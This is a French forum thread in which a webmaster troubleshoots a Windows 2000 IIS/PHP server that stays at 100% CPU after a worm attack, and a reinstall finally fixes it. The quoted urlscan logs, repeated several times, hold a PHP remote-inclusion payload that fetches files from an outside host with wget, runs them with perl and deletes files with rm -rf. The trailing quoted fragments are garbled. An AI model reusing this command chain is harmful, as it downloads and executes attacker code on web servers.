Consommation CPU à 100% par DLLHOST.EXE depuis 3 jours !
Le
Julien Sambourg
Bonjour,
Je dispose d'un serveur web de production sous Windows 2000 SP4 avec tous
les patchs de sécurité + urlscan etc. Le tout fonctionne avec PHP en ISAPI
très bien depuis deux ans. Il s'agit d'un Pentium 4 2.4 ghz avec 1 Go de RAM
+ SCSI. Le site est en mode de protection isolé.
Dimanche matin, le CPU a commencé à s'emballer, je regarde dans les logs et
vois dans ceux d'urlscan des requetes de ce style:
page#&code@49/index.php?page=http://midomain.false.ca/~pillar/.zk/
php.gif?&cmdÍ%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f08895
55397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20mi
domain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20ses
s_189f0f0889555397a4de5485dd611113;wget%20midomain.false.ca/~pillar/.zk/sess
_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd6111
12;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd61111
4;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f0889555
397a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20sess_189f0
f0889555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20s
ess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114
%20sess_189f0f0889555397a4de5485
Visiblement d'après ce que je peux trouver sur Google, il s'agit d'un ver
qui essaye d'attaquer les scripts PHP. A priori le serveur n'est pas
touché/endommagé par ce ver mais la consommation CPU ne baisse pas et reste
à 100% en continu (en grande majorité consommée par le processus
DLLHOST.EXE) et les courbes de bande passantre MRTG montrent un débit
constant de 2 à 3 Mbps en direction du serveur au lieu des 200 à 300 Kbps
habituels. L'installation d'un filtre ISAPI de type URL rewriter me permet
de bloquer les requetes de ce virus et dès Lundi matin je n'en vois plus
apparaitre dans les logs. La consommation de bande passante a également
nettement baissée. En revanche, la consommation du CPU reste extremement
critique depuis!
Je n'ai pas fait de modifications dans le code du site, j'ai vérifié le code
PHP et tout semble ok. J'ai essayé plusieurs versions de PHP, créé un
nouveau site web dans la MMC de IIS, essayé le mode de protection en file
d'attente, désactivé les pubs sur le site, laissé le strict minimum, mis à
jour MySQL etc. Mais l'utilisation processeur reste entre 80% et 100% alors
qu'avant cet épisode de dimanche, le site était très performant et le CPU
était utilisé à environ 40% de moyenne et ce depuis de nombreux mois.
Il reste 500 Mo de RAM libre donc ça n'est pas un soucis. J'ai redémarré
plusieurs fois mais toujours rien. J'ai également vérifié la présence de
fichiers anormaux sur le disque, vidé les fichiers temporaires. Exécuté
Ad-Aware etc.
Du jour au lendemain, le même site exactement demande plus du double de
temps CPU supplémentaire pour s'exécuter et son affichage est d'une
lenteur
Ni les logs d'IIS ni la commande NETSTAT -NA ne laisse apparaitre d'adresses
IP se connectant au serveur plus fréquemment qu'une autre.
Tout cela me fait tout de même penser à une attaque de type DDOS sans que je
sache si cela a un lien avec le virus de dimanche.
Je précise que j'ai essayé les IIS Debug Tools sans que ca ne m'apporte
grand chose comme informations.
Nous sommes aujourd'hui Mardi soir et cela fait trois jours complet que je
travaille au problème sans avoir trouvé de solutions. Ce site web
représentant mon activité je suis aujourd'hui dans un beau pétrain. De plus
le serveur est dans une baie à 300 Km de chez moi donc ca n'est pas évident.
Trois solutions s'offrent à moi désormais: réinstaller IIS pour voir mais je
n'y crois pas, installer Apache pour tester! Ou me déplacer au datacenter
pour formater le disque dur du serveur et repartir à zéro en espérant que
cela ne continue pas.
Une autre solution serait que qqun parmi vous soit en mesure de me mettre
sur la bonne voie :-)
Je vous remercie pour votre attention et j'espère que vous pourrez m'aider
dans cette délicate épreuve.
--
Julien
Je dispose d'un serveur web de production sous Windows 2000 SP4 avec tous
les patchs de sécurité + urlscan etc. Le tout fonctionne avec PHP en ISAPI
très bien depuis deux ans. Il s'agit d'un Pentium 4 2.4 ghz avec 1 Go de RAM
+ SCSI. Le site est en mode de protection isolé.
Dimanche matin, le CPU a commencé à s'emballer, je regarde dans les logs et
vois dans ceux d'urlscan des requetes de ce style:
page#&code@49/index.php?page=http://midomain.false.ca/~pillar/.zk/
php.gif?&cmdÍ%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f08895
55397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20mi
domain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20ses
s_189f0f0889555397a4de5485dd611113;wget%20midomain.false.ca/~pillar/.zk/sess
_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd6111
12;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd61111
4;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f0889555
397a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20sess_189f0
f0889555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20s
ess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114
%20sess_189f0f0889555397a4de5485
Visiblement d'après ce que je peux trouver sur Google, il s'agit d'un ver
qui essaye d'attaquer les scripts PHP. A priori le serveur n'est pas
touché/endommagé par ce ver mais la consommation CPU ne baisse pas et reste
à 100% en continu (en grande majorité consommée par le processus
DLLHOST.EXE) et les courbes de bande passantre MRTG montrent un débit
constant de 2 à 3 Mbps en direction du serveur au lieu des 200 à 300 Kbps
habituels. L'installation d'un filtre ISAPI de type URL rewriter me permet
de bloquer les requetes de ce virus et dès Lundi matin je n'en vois plus
apparaitre dans les logs. La consommation de bande passante a également
nettement baissée. En revanche, la consommation du CPU reste extremement
critique depuis!
Je n'ai pas fait de modifications dans le code du site, j'ai vérifié le code
PHP et tout semble ok. J'ai essayé plusieurs versions de PHP, créé un
nouveau site web dans la MMC de IIS, essayé le mode de protection en file
d'attente, désactivé les pubs sur le site, laissé le strict minimum, mis à
jour MySQL etc. Mais l'utilisation processeur reste entre 80% et 100% alors
qu'avant cet épisode de dimanche, le site était très performant et le CPU
était utilisé à environ 40% de moyenne et ce depuis de nombreux mois.
Il reste 500 Mo de RAM libre donc ça n'est pas un soucis. J'ai redémarré
plusieurs fois mais toujours rien. J'ai également vérifié la présence de
fichiers anormaux sur le disque, vidé les fichiers temporaires. Exécuté
Ad-Aware etc.
Du jour au lendemain, le même site exactement demande plus du double de
temps CPU supplémentaire pour s'exécuter et son affichage est d'une
lenteur
Ni les logs d'IIS ni la commande NETSTAT -NA ne laisse apparaitre d'adresses
IP se connectant au serveur plus fréquemment qu'une autre.
Tout cela me fait tout de même penser à une attaque de type DDOS sans que je
sache si cela a un lien avec le virus de dimanche.
Je précise que j'ai essayé les IIS Debug Tools sans que ca ne m'apporte
grand chose comme informations.
Nous sommes aujourd'hui Mardi soir et cela fait trois jours complet que je
travaille au problème sans avoir trouvé de solutions. Ce site web
représentant mon activité je suis aujourd'hui dans un beau pétrain. De plus
le serveur est dans une baie à 300 Km de chez moi donc ca n'est pas évident.
Trois solutions s'offrent à moi désormais: réinstaller IIS pour voir mais je
n'y crois pas, installer Apache pour tester! Ou me déplacer au datacenter
pour formater le disque dur du serveur et repartir à zéro en espérant que
cela ne continue pas.
Une autre solution serait que qqun parmi vous soit en mesure de me mettre
sur la bonne voie :-)
Je vous remercie pour votre attention et j'espère que vous pourrez m'aider
dans cette délicate épreuve.
--
Julien
Poser une question
Je dirais que le virus est toujours actif.
Essaye ce lien
http://securityresponse.symantec.co....worm.html
ou les antivirus en ligne.
Oliv'
"Julien Sambourg" 41d1f34a$0$32756$
Bonjour,
Je dispose d'un serveur web de production sous Windows 2000 SP4 avec tous
les patchs de sécurité + urlscan etc. Le tout fonctionne avec PHP en ISAPI
très bien depuis deux ans. Il s'agit d'un Pentium 4 2.4 ghz avec 1 Go de RAM
+ SCSI. Le site est en mode de protection isolé.
Dimanche matin, le CPU a commencé à s'emballer, je regarde dans les logs et
vois dans ceux d'urlscan des requetes de ce style:
page#&/index.php?page=http://midomain.false.ca/~pillar/.zk/
php.gif?&cmdÍ%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f08895
55397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20mi
domain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20ses
s_189f0f0889555397a4de5485dd611113;wget%20midomain.false.ca/~pillar/.zk/sess
_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd6111
12;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd61111
4;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f0889555
397a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20sess_189f0
f0889555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20s
ess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114
%20sess_189f0f0889555397a4de5485
Visiblement d'après ce que je peux trouver sur Google, il s'agit d'un ver
qui essaye d'attaquer les scripts PHP. A priori le serveur n'est pas
touché/endommagé par ce ver mais la consommation CPU ne baisse pas et reste
à 100% en continu (en grande majorité consommée par le processus
DLLHOST.EXE) et les courbes de bande passantre MRTG montrent un débit
constant de 2 à 3 Mbps en direction du serveur au lieu des 200 à 300 Kbps
habituels. L'installation d'un filtre ISAPI de type URL rewriter me permet
de bloquer les requetes de ce virus et dès Lundi matin je n'en vois plus
apparaitre dans les logs. La consommation de bande passante a également
nettement baissée. En revanche, la consommation du CPU reste extremement
critique depuis!
Je n'ai pas fait de modifications dans le code du site, j'ai vérifié le code
PHP et tout semble ok. J'ai essayé plusieurs versions de PHP, créé un
nouveau site web dans la MMC de IIS, essayé le mode de protection en file
d'attente, désactivé les pubs sur le site, laissé le strict minimum, mis à
jour MySQL etc. Mais l'utilisation processeur reste entre 80% et 100% alors
qu'avant cet épisode de dimanche, le site était très performant et le CPU
était utilisé à environ 40% de moyenne et ce depuis de nombreux mois.
Il reste 500 Mo de RAM libre donc ça n'est pas un soucis. J'ai redémarré
plusieurs fois mais toujours rien. J'ai également vérifié la présence de
fichiers anormaux sur le disque, vidé les fichiers temporaires. Exécuté
Ad-Aware etc.
Du jour au lendemain, le même site exactement demande plus du double de
temps CPU supplémentaire pour s'exécuter et son affichage est d'une
lenteur......
Ni les logs d'IIS ni la commande NETSTAT -NA ne laisse apparaitre d'adresses
IP se connectant au serveur plus fréquemment qu'une autre.
Tout cela me fait tout de même penser à une attaque de type DDOS sans que je
sache si cela a un lien avec le virus de dimanche.
Je précise que j'ai essayé les IIS Debug Tools sans que ca ne m'apporte
grand chose comme informations.
Nous sommes aujourd'hui Mardi soir et cela fait trois jours complet que je
travaille au problème sans avoir trouvé de solutions. Ce site web
représentant mon activité je suis aujourd'hui dans un beau pétrain. De plus
le serveur est dans une baie à 300 Km de chez moi donc ca n'est pas évident.
Trois solutions s'offrent à moi désormais: réinstaller IIS pour voir mais je
n'y crois pas, installer Apache pour tester! Ou me déplacer au datacenter
pour formater le disque dur du serveur et repartir à zéro en espérant que
cela ne continue pas.
Une autre solution serait que qqun parmi vous soit en mesure de me mettre
sur la bonne voie :-)
Je vous remercie pour votre attention et j'espère que vous pourrez m'aider
dans cette délicate épreuve.
--
Julien
Merci pour la réponse. J'ai déjà scanné le disque avec un antivirus sans
qu'il ne trouve rien. Mais bon peu importe puisque je me suis finalement
rendu sur place pour une réinstallation du système et ça remarche comme
avant. J'ignore ce qui a pû se passer...
--
Julien
"Oliv'" message de news:41d913da$0$2763$
http://securityresponse.symantec.co....worm.html
RAM
et
php.gif?&cmdÍ%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f08895
55397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20mi
domain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20ses
s_189f0f0889555397a4de5485dd611113;wget%20midomain.false.ca/~pillar/.zk/sess
_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd6111
12;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd61111
4;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f0889555
397a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20sess_189f0
f0889555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20s
ess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114
reste
code
alors
d'adresses
je
plus
évident.
je